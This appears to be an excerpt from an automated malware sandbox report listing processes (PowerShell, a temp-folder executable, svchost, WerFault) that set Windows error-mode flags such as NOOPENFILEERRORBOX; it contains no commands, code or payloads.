Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1073650001\Ryu8yUx.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1073650001\Ryu8yUx.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1073650001\Ryu8yUx.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1073650001\Ryu8yUx.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1073650001\Ryu8yUx.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1073650001\Ryu8yUx.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1073650001\Ryu8yUx.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1073650001\Ryu8yUx.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1073650001\Ryu8yUx.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1073650001\Ryu8yUx.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1073650001\Ryu8yUx.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1073650001\Ryu8yUx.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1073650001\Ryu8yUx.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1073650001\Ryu8yUx.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1073650001\Ryu8yUx.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1073650001\Ryu8yUx.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1073650001\Ryu8yUx.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1073650001\Ryu8yUx.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1073650001\Ryu8yUx.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1073650001\Ryu8yUx.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1073650001\Ryu8yUx.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1073650001\Ryu8yUx.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1073650001\Ryu8yUx.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
